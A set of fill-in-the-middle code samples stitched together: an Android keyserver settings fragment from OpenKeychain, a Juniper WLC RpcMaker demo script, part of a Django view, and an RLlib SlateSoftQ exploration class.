kwargs['year'], 'month': self.month_names[kwargs['month']]})<|fim▁end|>
from django.views.generic.detail import DetailView from django.views.generic.list import ListView from django.views.generic.base import RedirectView from django.core.urlresolvers import reverse
<|file_name|>SettingsKeyserverFragment.java<|end_file_name|><|fim▁begin|>/* * Copyright (C) 2012-2015 Dominik Schürmann <[email protected]> * Copyright (C) 2015 Adithya Abraham Philip <[email protected]> * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ package org.sufficientlysecure.keychain.ui; import android.os.Bundle; import android.os.Handler; import android.os.Message; import android.os.Messenger; import android.support.v4.app.Fragment; import android.support.v4.view.MotionEventCompat; import android.support.v7.widget.LinearLayoutManager; import android.support.v7.widget.RecyclerView; import android.support.v7.widget.helper.ItemTouchHelper; import android.view.LayoutInflater; import android.view.Menu; import android.view.MenuInflater; import android.view.MenuItem; import android.view.MotionEvent; import android.view.View; import android.view.ViewGroup; import android.widget.ImageView; import android.widget.TextView; import org.sufficientlysecure.keychain.R; import org.sufficientlysecure.keychain.ui.dialog.AddEditKeyserverDialogFragment; import org.sufficientlysecure.keychain.ui.util.FormattingUtils; import org.sufficientlysecure.keychain.ui.util.Notify; import org.sufficientlysecure.keychain.ui.util.recyclerview.ItemTouchHelperAdapter; import org.sufficientlysecure.keychain.ui.util.recyclerview.ItemTouchHelperDragCallback; import org.sufficientlysecure.keychain.ui.util.recyclerview.ItemTouchHelperViewHolder; import org.sufficientlysecure.keychain.ui.util.recyclerview.RecyclerItemClickListener; import org.sufficientlysecure.keychain.keyimport.ParcelableHkpKeyserver; import org.sufficientlysecure.keychain.util.Preferences; import java.util.ArrayList; import java.util.Collections; public class SettingsKeyserverFragment extends Fragment implements RecyclerItemClickListener.OnItemClickListener { private static final String ARG_KEYSERVER_ARRAY = "arg_keyserver_array"; private ItemTouchHelper mItemTouchHelper; private ArrayList<ParcelableHkpKeyserver> mKeyservers; private KeyserverListAdapter mAdapter; public static SettingsKeyserverFragment newInstance(ArrayList<ParcelableHkpKeyserver> keyservers) { Bundle args = new Bundle(); args.putParcelableArrayList(ARG_KEYSERVER_ARRAY, keyservers); SettingsKeyserverFragment fragment = new SettingsKeyserverFragment(); fragment.setArguments(args); return fragment; } @Override public View onCreateView(LayoutInflater inflater, ViewGroup container, Bundle savedInstanceState) { return inflater.inflate(R.layout.settings_keyserver_fragment, null); } @Override public void onViewCreated(View view, Bundle savedInstanceState) { super.onViewCreated(view, savedInstanceState); mKeyservers = getArguments().getParcelableArrayList(ARG_KEYSERVER_ARRAY); mAdapter = new KeyserverListAdapter(mKeyservers); RecyclerView recyclerView = (RecyclerView) view.findViewById(R.id.keyserver_recycler_view); // recyclerView.setHasFixedSize(true); // the size of the first item changes recyclerView.setAdapter(mAdapter); recyclerView.setLayoutManager(new LinearLayoutManager(getActivity())); ItemTouchHelper.Callback callback = new ItemTouchHelperDragCallback(mAdapter); mItemTouchHelper = new ItemTouchHelper(callback); mItemTouchHelper.attachToRecyclerView(recyclerView); // for clicks recyclerView.addOnItemTouchListener(new RecyclerItemClickListener(getActivity(), this)); // can't use item decoration because it doesn't move with drag and drop // recyclerView.addItemDecoration(new DividerItemDecoration(getActivity(), null)); // We have a menu item to show in action bar. setHasOptionsMenu(true); } @Override public void onCreateOptionsMenu(final Menu menu, final MenuInflater inflater) { inflater.inflate(R.menu.keyserver_pref_menu, menu); super.onCreateOptionsMenu(menu, inflater); } @Override public boolean onOptionsItemSelected(MenuItem item) { switch (item.getItemId()) { case R.id.menu_add_keyserver: startAddKeyserverDialog(); return true; default: return super.onOptionsItemSelected(item); } } private void startAddKeyserverDialog() { // keyserver and position have no meaning startEditKeyserverDialog(AddEditKeyserverDialogFragment.DialogAction.ADD, null, -1); } private void startEditKeyserverDialog(AddEditKeyserverDialogFragment.DialogAction action, ParcelableHkpKeyserver keyserver, final int position) { Handler returnHandler = new Handler() { @Override public void handleMessage(Message message) { Bundle data = message.getData(); switch (message.what) { case AddEditKeyserverDialogFragment.MESSAGE_OKAY: { boolean deleted = data.getBoolean(AddEditKeyserverDialogFragment.MESSAGE_KEYSERVER_DELETED , false); if (deleted) { Notify.create(getActivity(), getActivity().getString( R.string.keyserver_preference_deleted, mKeyservers.get(position)), Notify.Style.OK) .show(); deleteKeyserver(position); return; } boolean verified = data.getBoolean(AddEditKeyserverDialogFragment.MESSAGE_VERIFIED); if (verified) { Notify.create(getActivity(), R.string.add_keyserver_connection_verified, Notify.Style.OK).show(); } else { Notify.create(getActivity(), R.string.add_keyserver_without_verification, Notify.Style.WARN).show(); } ParcelableHkpKeyserver keyserver = data.getParcelable( AddEditKeyserverDialogFragment.MESSAGE_KEYSERVER); AddEditKeyserverDialogFragment.DialogAction dialogAction = (AddEditKeyserverDialogFragment.DialogAction) data.getSerializable( AddEditKeyserverDialogFragment.MESSAGE_DIALOG_ACTION); switch (dialogAction) { case ADD:<|fim▁hole|> case EDIT: editKeyserver(keyserver, position); break; } break; } } } }; // Create a new Messenger for the communication back Messenger messenger = new Messenger(returnHandler); AddEditKeyserverDialogFragment dialogFragment = AddEditKeyserverDialogFragment .newInstance(messenger, action, keyserver, position); dialogFragment.show(getFragmentManager(), "addKeyserverDialog"); } private void addKeyserver(ParcelableHkpKeyserver keyserver) { mKeyservers.add(keyserver); mAdapter.notifyItemInserted(mKeyservers.size() - 1); saveKeyserverList(); } private void editKeyserver(ParcelableHkpKeyserver newKeyserver, int position) { mKeyservers.set(position, newKeyserver); mAdapter.notifyItemChanged(position); saveKeyserverList(); } private void deleteKeyserver(int position) { if (mKeyservers.size() == 1) { Notify.create(getActivity(), R.string.keyserver_preference_cannot_delete_last, Notify.Style.ERROR).show(); return; } mKeyservers.remove(position); // we use this mAdapter.notifyItemRemoved(position); if (position == 0 && mKeyservers.size() > 0) { // if we deleted the first item, we need the adapter to redraw the new first item mAdapter.notifyItemChanged(0); } saveKeyserverList(); } private void saveKeyserverList() { Preferences.getPreferences(getActivity()).setKeyServers(mKeyservers); } @Override public void onItemClick(View view, int position) { startEditKeyserverDialog(AddEditKeyserverDialogFragment.DialogAction.EDIT, mKeyservers.get(position), position); } public class KeyserverListAdapter extends RecyclerView.Adapter<KeyserverListAdapter.ViewHolder> implements ItemTouchHelperAdapter { private final ArrayList<ParcelableHkpKeyserver> mKeyservers; public KeyserverListAdapter(ArrayList<ParcelableHkpKeyserver> keyservers) { mKeyservers = keyservers; } @Override public ViewHolder onCreateViewHolder(ViewGroup parent, int viewType) { View view = LayoutInflater.from(parent.getContext()) .inflate(R.layout.settings_keyserver_item, parent, false); return new ViewHolder(view); } @Override public void onBindViewHolder(final ViewHolder holder, int position) { holder.keyserverUrl.setText(mKeyservers.get(position).getUrl()); // Start a drag whenever the handle view it touched holder.dragHandleView.setOnTouchListener(new View.OnTouchListener() { @Override public boolean onTouch(View v, MotionEvent event) { if (MotionEventCompat.getActionMasked(event) == MotionEvent.ACTION_DOWN) { mItemTouchHelper.startDrag(holder); } return false; } }); selectUnselectKeyserver(holder, position); } private void selectUnselectKeyserver(ViewHolder holder, int position) { if (position == 0) { holder.showAsSelectedKeyserver(); } else { holder.showAsUnselectedKeyserver(); } } @Override public void onItemMove(RecyclerView.ViewHolder source, RecyclerView.ViewHolder target, int fromPosition, int toPosition) { Collections.swap(mKeyservers, fromPosition, toPosition); saveKeyserverList(); selectUnselectKeyserver((ViewHolder) target, fromPosition); // we don't want source to change color while dragging, therefore we just set // isSelectedKeyserver instead of selectUnselectKeyserver ((ViewHolder) source).isSelectedKeyserver = toPosition == 0; notifyItemMoved(fromPosition, toPosition); } @Override public int getItemCount() { return mKeyservers.size(); } public class ViewHolder extends RecyclerView.ViewHolder implements ItemTouchHelperViewHolder { public final ViewGroup outerLayout; public final TextView selectedServerLabel; public final TextView keyserverUrl; public final ImageView dragHandleView; private boolean isSelectedKeyserver = false; public ViewHolder(View itemView) { super(itemView); outerLayout = (ViewGroup) itemView.findViewById(R.id.outer_layout); selectedServerLabel = (TextView) itemView.findViewById( R.id.selected_keyserver_title); keyserverUrl = (TextView) itemView.findViewById(R.id.keyserver_tv); dragHandleView = (ImageView) itemView.findViewById(R.id.drag_handle); itemView.setClickable(true); } public void showAsSelectedKeyserver() { isSelectedKeyserver = true; selectedServerLabel.setVisibility(View.VISIBLE); outerLayout.setBackgroundColor(FormattingUtils.getColorFromAttr(getContext(), R.attr.colorPrimaryDark)); } public void showAsUnselectedKeyserver() { isSelectedKeyserver = false; selectedServerLabel.setVisibility(View.GONE); outerLayout.setBackgroundColor(0); } @Override public void onItemSelected() { selectedServerLabel.setVisibility(View.GONE); itemView.setBackgroundColor(FormattingUtils.getColorFromAttr(getContext(), R.attr.colorBrightToolbar)); } @Override public void onItemClear() { if (isSelectedKeyserver) { showAsSelectedKeyserver(); } else { showAsUnselectedKeyserver(); } } } } }<|fim▁end|>
addKeyserver(keyserver); break;
<|file_name|>maker.py<|end_file_name|><|fim▁begin|>import demowlcutils from demowlcutils import ppxml, WLC_login from pprint import pprint as pp from jnpr.wlc import WirelessLanController as WLC wlc = WLC(host='a', user='b', password='c') r = wlc.RpcMaker( target='vlan', name='Jeremy') # you can access the following attributes, refer to the jnpr.wlc.builder # file for more details # r.cmd # r.target<|fim▁hole|><|fim▁end|>
# r.args
<|file_name|>slate_soft_q.py<|end_file_name|><|fim▁begin|>from typing import Union from ray.rllib.models.action_dist import ActionDistribution from ray.rllib.utils.annotations import override from ray.rllib.utils.exploration.exploration import TensorType from ray.rllib.utils.exploration.soft_q import SoftQ from ray.rllib.utils.framework import try_import_tf, try_import_torch tf1, tf, tfv = try_import_tf() torch, _ = try_import_torch() class SlateSoftQ(SoftQ): @override(SoftQ) def get_exploration_action( self, action_distribution: ActionDistribution, timestep: Union[int, TensorType], explore: bool = True, ):<|fim▁hole|> assert ( self.framework == "torch" ), "ERROR: SlateSoftQ only supports torch so far!" cls = type(action_distribution) # Re-create the action distribution with the correct temperature # applied. action_distribution = cls( action_distribution.inputs, self.model, temperature=self.temperature ) batch_size = action_distribution.inputs.size()[0] action_logp = torch.zeros(batch_size, dtype=torch.float) self.last_timestep = timestep # Explore. if explore: # Return stochastic sample over (q-value) logits. action = action_distribution.sample() # Return the deterministic "sample" (argmax) over (q-value) logits. else: action = action_distribution.deterministic_sample() return action, action_logp<|fim▁end|>